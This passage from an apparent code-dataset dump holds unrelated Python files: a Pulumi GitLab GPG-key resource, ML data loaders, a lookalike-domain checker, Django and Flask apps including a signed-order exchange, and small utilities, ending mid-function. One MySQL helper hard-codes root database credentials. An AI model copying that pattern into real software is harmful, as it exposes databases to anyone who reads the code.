        ...
        -----END PGP PUBLIC KEY BLOCK-----\"\"\")
        ```
        ## Import
        You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.
        ```sh
         $ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1
        ```
        Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.
        ```sh
         $ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1
        ```
        :param str resource_name: The name of the resource.
        :param UserGpgKeyArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    # Runtime dispatcher for the two typed overloads above.
    def __init__(__self__, resource_name: str, *args, **kwargs):
        resource_args, opts = _utilities.get_resource_args_opts(UserGpgKeyArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    # Shared constructor body: validates options, builds the props bag, and
    # registers the resource with the Pulumi engine.
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 key: Optional[pulumi.Input[str]] = None,
                 user_id: Optional[pulumi.Input[int]] = None,
                 __props__=None):
        opts = pulumi.ResourceOptions.merge(_utilities.get_resource_opts_defaults(), opts)
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = UserGpgKeyArgs.__new__(UserGpgKeyArgs)
            if key is None and not opts.urn:
                raise TypeError("Missing required property 'key'")
            __props__.__dict__["key"] = key
            __props__.__dict__["user_id"] = user_id
            # Output-only properties start as None and are populated by the provider.
            __props__.__dict__["created_at"] = None
            __props__.__dict__["key_id"] = None
        super(UserGpgKey, __self__).__init__(
            'gitlab:index/userGpgKey:UserGpgKey',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            created_at: Optional[pulumi.Input[str]] = None,
            key: Optional[pulumi.Input[str]] = None,
            key_id: Optional[pulumi.Input[int]] = None,
            user_id: Optional[pulumi.Input[int]] = None) -> 'UserGpgKey':
        """
        Get an existing UserGpgKey resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] created_at: The time when this key was created in GitLab.
        :param pulumi.Input[str] key: The armored GPG public key.
        :param pulumi.Input[int] key_id: The ID of the GPG key.
        :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _UserGpgKeyState.__new__(_UserGpgKeyState)
        __props__.__dict__["created_at"] = created_at
        __props__.__dict__["key"] = key
        __props__.__dict__["key_id"] = key_id
        __props__.__dict__["user_id"] = user_id
        return UserGpgKey(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter(name="createdAt")
    def created_at(self) -> pulumi.Output[str]:
        """
        The time when this key was created in GitLab.
        """
        return pulumi.get(self, "created_at")
    @property
    @pulumi.getter
    def key(self) -> pulumi.Output[str]:
        """
        The armored GPG public key.
        """
        return pulumi.get(self, "key")
    @property
    @pulumi.getter(name="keyId")
    def key_id(self) -> pulumi.Output[int]:
        """
        The ID of the GPG key.
        """
        return pulumi.get(self, "key_id")
    @property
    @pulumi.getter(name="userId")
    def user_id(self) -> pulumi.Output[Optional[int]]:
        """
        The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
        """
        return pulumi.get(self, "user_id")
|
2,951 | 613b060ee50b49417342cfa70b36f77d112dcc58 | from collections import Counter
import pandas as pd
import string
from collections import namedtuple, defaultdict
import csv
import sys
import torch
import numpy as np
from sklearn.preprocessing import LabelEncoder
from scipy.sparse import coo_matrix
from tqdm import tqdm
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# NOTE(review): the line below overrides the CUDA detection above and forces
# CPU — presumably a debugging toggle; confirm before shipping.
device = 'cpu'
def get_data():
    """Load the color-reference corpus and keep successful one-word human games.

    Returns (df_final, le): the selected dataframe with its 'contents'
    column label-encoded in place, and the fitted LabelEncoder.
    """
    df = pd.read_csv("./data/filteredCorpus.csv")
    df_filt = df[df['outcome']==True] # use only successful games
    df_filt = df_filt[df_filt['role']=='speaker'] # use speaker utterances
    df_filt = df_filt[df_filt['source']=='human'] # use speaker utterances
    # making a list of utterances that we want to use, so we can take these rows from df_filt
    utt = df_filt['contents']
    utt_filt = [u.lower() for u in utt if len(u.split()) == 1] # only use one word utterances
    utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for u in utt_filt] # remove punctuation
    utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys()) # use utterances that appear more than once
    # df_filt = df_filt[df_filt['numCleanWords'] == 1]
    df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())
    df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(str.maketrans('', '', string.punctuation)))# filter to take out punctuation
    # NOTE(review): the final selection reads from the *unfiltered* df, so the
    # lowercasing/punctuation stripping applied to df_filt just above is never
    # used — confirm whether df_filt was intended here.
    df_final = df.loc[df['contents'].isin(utt_final)] # this is the dataset of all the games that we want to use
    le = LabelEncoder()
    df_final['contents'] = le.fit_transform(df_final['contents'])
    return df_final, le
def get_meaning_matrix(df):
    """Cross-tabulate click colors against utterances into a count matrix.

    Encodes each (H, S, L) click color as an integer label, then returns
    (meaning_mat, colors_le): meaning_mat[i, j] counts how often color i was
    described with utterance j; colors_le maps row indices back to colors.
    Mutates df by adding/encoding a 'colors' column.
    """
    df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))
    df['colors'] = df['colors'].apply(lambda x: str(x))
    colors_le = LabelEncoder()
    df['colors'] = colors_le.fit_transform(df['colors']) # 100 x 100 (test data)
    print("length colors and contents", len(df['colors']), len(df['contents']))
    print("set colors and contents", len(set(df['colors'])), len(set(df['contents'])))
    meaning_mat = pd.crosstab(df['colors'], df['contents']) # rows are colors, columns are utterances
    # row numbers and column numbers correspond to labels from colors_le and le (utterances) from get_data()
    meaning_mat = np.array(meaning_mat) # a num_color x num_utterances matrix
    # Diagnostic pass: report empty rows and zero cells (sparsity check only;
    # the matrix is returned unmodified).
    for i in range(len(meaning_mat[:,0])):
        if sum(meaning_mat[i,:]) == 0:
            print("meaning mat is 0 for this row: ", i)
        for j in range(len(meaning_mat[0,:])):
            if meaning_mat[i,j] == 0:
                print("meaning mat is 0 at: ", i,j," !!!")
    return meaning_mat, colors_le
# Literal listener data function
def get_pragmatic_listener_testing_data(df):
    """Build pragmatic-listener test examples from the games dataframe.

    For each game, the clicked (correct) color and the two alternatives are
    stacked in a random order and the position of the correct color is
    recorded as the label.

    Returns (examples, all_utt, desc_to_idx) where each example is
    (correct_referent_idx, shuffled 3x3 color tensor, utterance index).
    """
    output = []
    all_utt = list(set(list(df['contents'])))
    desc_to_idx = {u: i for i, u in enumerate(all_utt)}
    for _, row in tqdm(df.iterrows(), total=len(df)):
        utt = torch.tensor(row['contents']).to(device)
        correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32)
        alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']], dtype=torch.float32)
        alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']], dtype=torch.float32)
        colors = (correct, alt1, alt2)
        idxs = np.arange(3)
        np.random.shuffle(idxs)  # random permutation of the three referents
        colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]], colors[idxs[2]]]).to(device)
        # BUG FIX: the label must be the *position* the correct color (index 0)
        # landed in, i.e. where idxs == 0 — not idxs[0], which is the original
        # index of whatever color was placed in slot 0.  The two values differ
        # for non-self-inverse permutations such as [1, 2, 0].
        correct_pos = int(np.flatnonzero(idxs == 0)[0])
        correct_idx = torch.tensor(correct_pos, dtype=torch.long).to(device)
        output.append((correct_idx, colors_shuff, utt))
    return output, all_utt, desc_to_idx  # [correct_referent_idx, three_referents, descriptor_idx]
def get_literal_listener_training_data(df):
    """Build literal-listener training examples from the games dataframe.

    Each example is (correct_referent_idx, shuffled 3x3 color tensor,
    utterance index); the three referent colors are stacked in random order
    and the label records where the correct color ended up.
    """
    output = []
    for _, row in tqdm(df.iterrows(), total=len(df)):
        utt = torch.tensor(row['contents']).to(device)
        correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32)
        alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']], dtype=torch.float32)
        alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']], dtype=torch.float32)
        colors = (correct, alt1, alt2)
        idxs = np.arange(3)
        np.random.shuffle(idxs)  # random permutation of the three referents
        colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]], colors[idxs[2]]]).to(device)
        # BUG FIX: the label must be the *position* the correct color (index 0)
        # landed in, i.e. where idxs == 0 — not idxs[0], which is the original
        # index of the color placed in slot 0 (wrong for e.g. idxs = [1, 2, 0]).
        correct_pos = int(np.flatnonzero(idxs == 0)[0])
        correct_idx = torch.tensor(correct_pos, dtype=torch.long).to(device)
        output.append((correct_idx, colors_shuff, utt))
    return output  # [correct_referent_idx, list_of_three_referents, descriptor_idx]
# Literal Speaker data function - hi r u ok
def get_literal_speaker_training_data(df):
    """Build (color, utterance-index) training pairs for the literal speaker."""
    pairs = []
    progress = tqdm(df.iterrows(), total=len(df))
    for _, row in progress:
        utterance_idx = torch.tensor(row['contents'], dtype=torch.long).to(device)
        color_feats = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32).to(device)
        pairs.append([color_feats, utterance_idx])
    return pairs  # each item: [referent color tensor, utterance index]
|
2,952 | 6d974580ff546bda17caa1e61e2621b4bc705f3f | from flask import jsonify
from flask_restful import Resource
from flask_apispec.views import MethodResource
import pandas as pd
import jellyfish
df = pd.read_csv('data/trancotop1m.csv')
df_dict = df.to_dict('records')
class StrComparison(MethodResource,Resource):
    # REST endpoint: fuzzy-match *domain* against the Tranco top-1M list to
    # detect lookalike/typosquat domains.
    # @requires_auth
    def get(self, domain):
        """Return JSON describing the closest known domain, if any scores > 0.97."""
        domain_found = ""
        similar = False
        # Jaro-Winkler similarity against every known domain; stop at the
        # first sufficiently close hit.
        for row in df_dict:
            result = jellyfish.jaro_winkler_similarity(str(row['domain']), str(domain))
            if result > 0.97:
                similar = True
                break
        # NOTE(review): if df_dict is ever empty, `result` and `row` are
        # unbound here and this raises NameError — confirm the list is
        # guaranteed non-empty.
        detail = "Found near domain by distance string comparison: " + str(result) if similar else "Not similar domain found."
        domain_found = str(row['domain']) if similar else ""
        return jsonify({"feature": "strcomparison", "domain": domain, "result": domain_found, "detail": detail})
2,953 | 7bcbcbe51217b2ea9044a7e4a4bebf315069c92d | """
Create a function that takes two number strings and returns their sum as a string.
Examples
add("111", "111") ➞ "222"
add("10", "80") ➞ "90"
add("", "20") ➞ "Invalid Operation"
Notes
If any input is "" or None, return "Invalid Operation".
"""
def add(n1, n2):
    """Return the sum of two numeric strings as a string.

    Returns "Invalid Operation" when either input is None or the empty
    string, per the exercise spec.
    """
    # One guard covers both invalid cases; `is None` is the idiomatic null test
    # (the original used `== None` across two redundant branches).
    if n1 is None or n2 is None or n1 == "" or n2 == "":
        return "Invalid Operation"
    return str(int(n1) + int(n2))
# Quick manual check: prints "222" and <class 'str'>.
print(add("111", "111"))
print(type(add("111", "111")))
|
2,954 | f5b8d8c291d18c6f320704a89985acbcae97ca2f | from ImageCoord import ImageCoord
import os
import sys
from folium.features import DivIcon
# Ask the user (via a folder-picker dialog) which directory holds the photos.
# BUG FIX: tkinter and filedialog were used below but never imported, so the
# original script crashed with NameError on the first line.
import tkinter
from tkinter import filedialog
racine = tkinter.Tk()
racine.title("listPhoto")
racine.directory = filedialog.askdirectory()
cheminDossier = racine.directory
dirImage = os.listdir(cheminDossier)
listImage = []
# Walk the chosen directory and keep only the images carrying GPS coordinates.
for nomImage in dirImage:
    # os.path.join is portable; the original hard-coded a Windows backslash.
    img = ImageCoord(os.path.join(cheminDossier, nomImage))
    if img.has_coord():
        listImage.append(img)
# Sort the geotagged images (ImageCoord defines its own ordering).
listImage.sort()
|
2,955 | bce794616889b80c152a8ebec8d02e49a96684e9 | import csv, io
from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth.decorators import permission_required
from django.views import generic
from itertools import chain
from .models import Player, League, Team
class IndexView(generic.ListView):
    # Renders the full player list page.
    template_name = 'players/players.html'
    context_object_name = 'players'
    def get_queryset(self):
        # NOTE(review): chains Player rows with Player._meta.get_fields() —
        # presumably the template iterates both the data and the field
        # metadata (e.g. for table headers); confirm against the template.
        return list(chain(Player.objects.all(), Player._meta.get_fields()))
def rate(stats):
    """Aggregate a weighted per-90-minutes score from raw stat strings.

    stats[3] holds minutes played; every other indexed stat is scaled to a
    per-90-minutes value and divided by its weight.  Indices 11-13 count
    against the score, everything else in favour.
    """
    # (stat index, weight, sign) listed in the exact order the original code
    # accumulated them, so floating-point results are bit-for-bit identical.
    terms = (
        (4, 30, 1.0), (5, 40, 1.0), (6, 2, 1.0), (7, 1, 1.0), (8, 3, 1.0),
        (9, 1.5, 1.0), (10, 5, 1.0), (11, 1.2, -1.0), (12, 0.5, -1.0),
        (13, 1.5, -1.0), (14, 0.5, 1.0), (15, 11, 1.0), (16, 4, 1.0),
        (17, 1, 1.0), (18, 2, 1.0), (19, 1, 1.0), (20, 1, 1.0), (21, 1, 1.0),
        (22, 2.5, 1.0), (23, 1, 1.0), (24, 2, 1.0), (25, 1, 1.0), (26, 5, 1.0),
        (27, 0.5, 1.0), (28, 10, 1.0),
    )
    minutes = float(stats[3])
    total = 0.
    for idx, weight, sign in terms:
        contribution = float(stats[idx]) / minutes * 90 / weight
        total = total + sign * contribution
    return total
@permission_required('admin.can_addlog_entry')
def player_upload(request):
    """Import player statistics from an uploaded colon-delimited CSV file.

    GET renders the upload form; POST parses the file, normalises each row
    (mojibake, decimal commas, unit suffixes), skips players with < 180
    minutes or no league, creates missing League/Team rows, and stores
    per-90-minutes stats on Player records.
    """
    template = 'players/player_upload.html'
    prompt = {
        'order': ''
    }
    if request.method == "GET":
        return render(request, template, prompt)
    csv_file = request.FILES['file']
    if not csv_file.name.endswith('.csv'):
        messages.error(request, 'This is not a csv file')
        # NOTE(review): processing continues even after this error — confirm
        # whether a `return` is missing here.
    data_set = csv_file.read().decode('UTF-8')
    io_string = io.StringIO(data_set)
    next(io_string)
    for column in csv.reader(io_string, delimiter=':', quotechar='|'):
        # Clean every numeric cell (columns 0 and 1 are name/position text):
        # repair encoding artifacts, decimal commas, unit suffixes, and
        # placeholder dashes.
        for i, stat in enumerate(column):
            if i in [0, 1]:
                continue
            column[i] = column[i].replace('Åš', 'Ś')
            column[i] = column[i].replace(',', '.')
            column[i] = column[i].replace('km', '')
            column[i] = column[i].replace('Â\xa0', '')
            column[i] = column[i].replace('-', '0')
        # Skip players with fewer than 180 minutes or no league recorded.
        if int(column[3]) < 180:
            continue
        if column[32] == '0':
            continue
        if not League.objects.filter(name=column[32]):
            League.objects.update_or_create(
                name=column[32]
            )
        if not Team.objects.filter(name=column[31]):
            Team.objects.update_or_create(
                league_id=League.objects.filter(name=column[32])[0].id,
                name=column[31]
            )
        # NOTE(review): team_id is hard-coded to 2 even though a Team row was
        # just looked up/created above — confirm this is intentional.
        _, created = Player.objects.update_or_create(
            team_id=2,
            name=column[0],
            age=column[2],
            position=column[1],
            minutes=column[3],
            accurate_passes=float(column[4])/float(column[3])*90,
            passes=float(column[5])/float(column[3])*90,
            created_situations=float(column[6])/float(column[3])*90,
            key_passes=float(column[7])/float(column[3])*90,
            dribble=float(column[8])/float(column[3])*90,
            fouls_on=float(column[9])/float(column[3])*90,
            offsides=float(column[10])/float(column[3])*90,
            mistakes=float(column[11])/float(column[3])*90,
            culpable_goals=float(column[12])/float(column[3])*90,
            accurate_cross=float(column[13])/float(column[3])*90,
            assists=float(column[14])/float(column[3])*90,
            heads=float(column[15])/float(column[3])*90,
            tackles=float(column[16])/float(column[3])*90,
            key_heads=float(column[17])/float(column[3])*90,
            interceptions=float(column[18])/float(column[3])*90,
            catch_saves=float(column[19])/float(column[3])*90,
            saves=float(column[20])/float(column[3])*90,
            saves_on_corner=float(column[21])/float(column[3])*90,
            complete_tackles=float(column[22])/float(column[3])*90,
            accurate_shots=float(column[23])/float(column[3])*90,
            shots=float(column[24])/float(column[3])*90,
            key_tackles=float(column[25])/float(column[3])*90,
            win_heads=float(column[26])/float(column[3])*90,
            goals=float(column[27])/float(column[3])*90,
            crosses=float(column[28])/float(column[3])*90,
            rating=float(column[29]),
            club=column[31],
            league=column[32],
            rate=rate(column)
        )
    context = {}
    return render(request, template, context)
@permission_required('admin.can_addlog_entry')
def player_delete(request):
    # Wipe every Player row, then return to the upload form.
    Player.objects.all().delete()
    return redirect('player_upload')
@permission_required('admin.can_addlog_entry')
def player_club_delete(request, club):
    # Delete all players belonging to a single club.
    Player.objects.filter(club=club).delete()
    return redirect('players')
@permission_required('admin.can_addlog_entry')
def player_league_delete(request, league):
    # Delete all players belonging to a single league.
    Player.objects.filter(league=league).delete()
    return redirect('players')
|
2,956 | 3146775c466368c25c92bd6074abb97408533500 | import logging
# Cache of already-configured loggers, keyed by name, so repeated calls do
# not attach duplicate handlers.
loggers = {}
def create_logger(
        log_level: str = 'INFO',
        log_name: str = 'logfile',
        export_log: bool = True,
        save_dir: str = ''):
    """Create (or return a cached) logger named *log_name*.

    The logger itself is set to DEBUG; the console handler filters at
    *log_level*.  When *export_log* is true, a DEBUG-level file handler
    writing to ``{save_dir}/{log_name}.log`` (truncated on open) is added.
    """
    # Idiomatic membership test (was `in loggers.keys()`); early return keeps
    # the configuration path unindented.
    if log_name in loggers:
        return loggers[log_name]
    logger = logging.getLogger(log_name)
    logger.setLevel(logging.DEBUG)
    # Console handler filters at the caller-requested level.
    console_handler = logging.StreamHandler()
    console_handler.setLevel(log_level)
    formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
    console_handler.setFormatter(formatter)
    logger.addHandler(console_handler)
    if export_log:
        pathname = log_name
        if save_dir:  # truthiness check (was `len(save_dir) > 0`)
            pathname = f'{save_dir}/{pathname}'
        file_handler = logging.FileHandler(filename=f'{pathname}.log', mode='w')
        file_handler.setLevel('DEBUG')
        file_handler.setFormatter(formatter)
        logger.addHandler(file_handler)
    loggers[log_name] = logger
    return logger
|
2,957 | 6cb97e6f3c7ba312ec1458fd51635508a16f70dd | from mysql import connector
def get_db_connection():
    """Connect to the SMARTHOUSE MySQL database, creating it on first use.

    If connecting with the schema fails, connects without one, creates the
    SMARTHOUSE database, and retries recursively (one level in practice).
    NOTE(review): credentials are hard-coded in source — move them to
    configuration/secrets management.
    """
    try:
        return connector.connect(host="server_database_1", user="root", password="password1234", database="SMARTHOUSE")
    except connector.errors.DatabaseError:
        connection = connector.connect(host="server_database_1", user="root", password="password1234")
        cursor = connection.cursor()
        cursor.execute("CREATE DATABASE SMARTHOUSE")
        return get_db_connection()
|
2,958 | 919f1746bfdec61f5e81e6ce0e17bb3bf040230a | # square environment. there are the wall at the edge
from environment import super_environment
class SquareNormal(super_environment.Environment):
    """A square arena bounded by solid walls on all four edges."""
    def __init__(self, size_x, size_y):
        super().__init__(size_x, size_y)
    @staticmethod
    def environment_type():
        """Identifier string for this environment shape."""
        return 'square'
    def get_converted_position(self, position_before, position_after, radius):
        """Clamp *position_after* so a circle of *radius* stays inside the walls.

        *position_before* is accepted for interface compatibility but unused
        here: a move over the edge is simply clamped to the wall.
        Returns the corrected (x, y) tuple.
        """
        clamped_x, clamped_y = position_after[0], position_after[1]
        if clamped_x < radius:
            clamped_x = radius
        elif clamped_x + radius > self.screen_size_x:
            clamped_x = self.screen_size_x - radius
        if clamped_y < radius:
            clamped_y = radius
        elif clamped_y > self.screen_size_y - radius:
            clamped_y = self.screen_size_y - radius
        return clamped_x, clamped_y
|
2,959 | d9bdf466abecb50c399556b99b41896eead0cb4b | from flask import Flask, request, g
from flask_restful import Resource, Api
from sqlalchemy import create_engine
from flask import jsonify
import json
import eth_account
import algosdk
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm import scoped_session
from sqlalchemy.orm import load_only
from datetime import datetime
import sys
from models import Base, Order, Log
# SQLite backing store for orders; Order/Log models come from models.py.
engine = create_engine('sqlite:///orders.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
app = Flask(__name__)
# These decorators allow you to use g.session to access the database inside the request code
# g is an "application global" https://flask.palletsprojects.com/en/1.1.x/api/#application-globals
@app.before_request
def create_session():
    # Give each request its own scoped DB session, exposed as g.session.
    g.session = scoped_session(DBSession)
@app.teardown_appcontext
# def shutdown_session(response_or_exc):
def shutdown_session(exception=None):
    # Commit and dispose of the request-scoped session when the app context ends.
    sys.stdout.flush()
    g.session.commit()
    g.session.remove()
""" Suggested helper methods """
# check whether “sig” is a valid signature of json.dumps(payload),
# using the signature algorithm specified by the platform field.
# Be sure to verify the payload using the sender_pk.
def check_sig(payload,sig):
    """Verify *sig* over json.dumps(payload) using the payload's platform.

    Algorand signatures are verified with algosdk against sender_pk;
    Ethereum ones by recovering the signer from an encode_defunct message
    and comparing it to sender_pk.  Returns (verified, payload_json).
    """
    pk = payload['sender_pk']
    platform = payload['platform']
    payload_json = json.dumps(payload)
    result = False
    if platform == "Algorand":
        print("Algorand")
        if algosdk.util.verify_bytes(payload_json.encode('utf-8'), sig, pk):
            print("Algo sig verifies!")
            result = True
    elif platform == "Ethereum":
        print("Ethereum")
        eth_encoded_msg = eth_account.messages.encode_defunct(text=payload_json)
        if eth_account.Account.recover_message(eth_encoded_msg, signature=sig) == pk:
            print("Eth sig verifies!")
            result = True
    return result, payload_json
# def fill_order(order,txes=[]):
# pass
# the inner recursive function
def fill_order():
    """Match the most recently inserted order against the open book.

    Recursive: when two orders cross but one side is only partially filled,
    a child order for the remainder is inserted (linked via creator_id) and
    fill_order() is called again to try to match the child.
    """
    # get the order you just inserted from the DB
    current_order = g.session.query(Order).order_by(Order.id.desc()).first()
    # print("_order_id")
    # print(current_order.id)
    # Check if there are any existing orders that match and add them into a list
    order_list = []
    orders = g.session.query(Order).filter(Order.filled == None).all()
    for existing_order in orders:
        # A match requires the opposite currency pair, an implied exchange
        # rate at least as good as requested, and no prior counterparty.
        # if ((existing_order.buy_amount != 0) and (current_order.sell_amount != 0)):
        if ((existing_order.buy_currency == current_order.sell_currency)
            and (existing_order.sell_currency == current_order.buy_currency)
            and (existing_order.sell_amount / existing_order.buy_amount
            >= current_order.buy_amount / current_order.sell_amount)
            and (existing_order.counterparty_id == None)):
            order_list.append(existing_order)
    # If a match is found between order and existing_order
    if (len(order_list) > 0):
        # print(" order_list_length")
        # print(len(order_list))
        # pick the first one in the list
        match_order = order_list[0]
        # Set the filled field to be the current timestamp on both orders
        # Set counterparty_id to be the id of the other order
        match_order.filled = datetime.now()
        current_order.filled = datetime.now()
        match_order.counterparty_id = current_order.id
        current_order.counterparty_id = match_order.id
        g.session.commit()
        # if both orders can completely fill each other
        # no child order needs to be generated
        # If match_order is not completely filled
        if (current_order.sell_amount < match_order.buy_amount):
            # print("_match_order is not completely filled")
            # Child order keeps the matched order's exchange rate.
            diff = match_order.buy_amount - current_order.sell_amount
            exchange_rate_match = match_order.sell_amount / match_order.buy_amount
            sell_amount_new_match = diff * exchange_rate_match
            # print(match_order.id)
            # print(diff)
            # print(sell_amount_new_match)
            new_order = Order(sender_pk=match_order.sender_pk,
                              receiver_pk=match_order.receiver_pk,
                              buy_currency=match_order.buy_currency,
                              sell_currency=match_order.sell_currency,
                              buy_amount=diff,
                              sell_amount=sell_amount_new_match,
                              creator_id=match_order.id)
            g.session.add(new_order)
            g.session.commit()
            print("M")
            fill_order()
        # If current_order is not completely filled
        if (current_order.buy_amount > match_order.sell_amount):
            # print("_current_order is not completely filled")
            # Child order keeps the current order's exchange rate.
            diff = current_order.buy_amount - match_order.sell_amount
            exchange_rate_current = current_order.buy_amount / current_order.sell_amount
            sell_amount_new_current = diff / exchange_rate_current
            # print(current_order.id)
            # print(diff)
            # print(sell_amount_new_current)
            new_order = Order(sender_pk=current_order.sender_pk,
                              receiver_pk=current_order.receiver_pk,
                              buy_currency=current_order.buy_currency,
                              sell_currency=current_order.sell_currency,
                              buy_amount=diff,
                              sell_amount=sell_amount_new_current,
                              creator_id=current_order.id)
            g.session.add(new_order)
            g.session.commit()
            print("C")
            fill_order()
# Takes input dictionary d and writes it to the Log table
# Hint: use json.dumps or str() to get it in a nice string form
def log_message(d):
    # Persist *d* (JSON text or dict) as a row in the Log table.
    # NOTE(review): manually calls create_session/shutdown_session even though
    # Flask hooks also manage g.session — confirm the double management is intended.
    create_session()
    order_obj = Log(message=d)
    g.session.add(order_obj)
    shutdown_session()
# convert a row in DB into a dict
def row2dict(row):
    """Convert a SQLAlchemy model instance into a plain column-name -> value dict."""
    result = {}
    for column in row.__table__.columns:
        result[column.name] = getattr(row, column.name)
    return result
# print a dictionary nicely
def print_dict(d):
    """Pretty-print a dict, one "key  :  value" line per entry."""
    for key in d:
        value = d[key]
        print(key, ' : ', value)
""" End of helper methods """
@app.route('/trade', methods=['POST'])
def trade():
    """Accept a signed order: validate, verify, store, and try to fill it.

    Expects JSON {"sig": ..., "payload": {...}}.  Malformed or unverifiable
    submissions are written to the Log table; valid ones are stored in the
    Order table and matched via fill_order().  Returns JSON true/false.
    """
    print("In trade endpoint")
    if request.method == "POST":
        print("--------- trade ---------")
        content = request.get_json(silent=True)
        print( f"content = {json.dumps(content)}" )
        columns = [ "sender_pk", "receiver_pk", "buy_currency", "sell_currency", "buy_amount", "sell_amount", "platform" ]
        fields = [ "sig", "payload" ]
        # check whether the input contains both "sig" and "payload"
        for field in fields:
            if not field in content.keys():
                print( f"{field} not received by Trade" )
                print( json.dumps(content) )
                log_message(content)
                return jsonify( False )
        # check whether the input contains all 7 fields of payload
        for column in columns:
            if not column in content['payload'].keys():
                print( f"{column} not received by Trade" )
                print( json.dumps(content) )
                log_message(content)
                return jsonify( False )
        #Your code here
        #Note that you can access the database session using g.session
        # TODO 1: Check the signature
        # extract contents from json
        sig = content['sig']
        payload = content['payload']
        platform = payload['platform']
        # The platform must be either “Algorand” or "Ethereum".
        platforms = ["Algorand", "Ethereum"]
        if not platform in platforms:
            print("input platform is not Algorand or Ethereum")
            return jsonify(False)
        # check signature
        check_result = check_sig(payload,sig)
        result = check_result[0]
        payload_json = check_result[1]
        # TODO 2: Add the order to the database
        # TODO 4: Be sure to return jsonify(True) or jsonify(False) depending on if the method was successful
        # If the signature does not verify, do not insert the order into the “Order” table.
        # Instead, insert a record into the “Log” table, with the message field set to be json.dumps(payload).
        if result is False:
            print("signature does NOT verify")
            log_message(payload_json)
            return jsonify(result)
        # If the signature verifies, store the signature,
        # as well as all of the fields under the ‘payload’ in the “Order” table EXCEPT for 'platform’.
        if result is True:
            print("signature verifies")
            create_session()
            order_obj = Order(sender_pk=payload['sender_pk'],
                              receiver_pk=payload['receiver_pk'],
                              buy_currency=payload['buy_currency'],
                              sell_currency=payload['sell_currency'],
                              buy_amount=payload['buy_amount'],
                              sell_amount=payload['sell_amount'],
                              signature=sig)
            g.session.add(order_obj)
            # TODO 3: Fill the order
            fill_order()
            shutdown_session()
            return jsonify(result)
@app.route('/order_book')
def order_book():
    """Return every order in the database as JSON: {"data": [order dicts]}."""
    #Your code here
    #Note that you can access the database session using g.session
    # The “/order_book” endpoint should return a list of all orders in the database.
    # The response should contain a single key “data” that refers to a list of orders formatted as JSON.
    # Each order should be a dict with (at least) the following fields
    # ("sender_pk", "receiver_pk", "buy_currency", "sell_currency", "buy_amount", "sell_amount", “signature”).
    print("--------- order_book ---------")
    create_session()
    # get orders from DB into a list
    order_dict_list = [
        row2dict(order)
        for order in g.session.query(Order).all()
    ]
    # add the list into a dict
    result = {
        'data': order_dict_list
    }
    print("order book length: ")
    print(len(order_dict_list))
    # print_dict(order_dict_list[-2])
    # print_dict(order_dict_list[-1])
    shutdown_session()
    return jsonify(result)
# Development-server entry point.
if __name__ == '__main__':
    app.run(port='5002')
|
2,960 | 7c53c7bec6b6b2d4d6be89b750eeef83ca9115cc | from typing import List
class CourseSchedule:
    """Course Schedule (LeetCode #207).

    Decide whether every course can be completed given prerequisite pairs.
    The plan is feasible iff the prerequisite graph is acyclic, so we run a
    DFS that tracks the courses on the current recursion path: reaching one
    of them again means a cycle.  Courses proven completable get their
    adjacency list emptied, which memoizes the answer and keeps the whole
    traversal O(V + E) in both time and space.
    """
    def can_finish(self, numCourses: int, prerequisites: List[List[int]]) -> bool:
        """Return True iff all *numCourses* courses can be finished."""
        # Adjacency list: course -> its direct prerequisites.
        prereqs_by_course = {course: [] for course in range(numCourses)}
        for course, prereq in prerequisites:
            prereqs_by_course[course].append(prereq)
        on_path = set()  # courses on the active DFS path (cycle detector)
        def completable(course):
            # Back-edge: this course is already on the active path -> cycle.
            if course in on_path:
                return False
            # Already cleared, or never had prerequisites to begin with.
            if prereqs_by_course[course] == []:
                return True
            on_path.add(course)
            for prereq in prereqs_by_course[course]:
                if not completable(prereq):
                    return False
            on_path.remove(course)
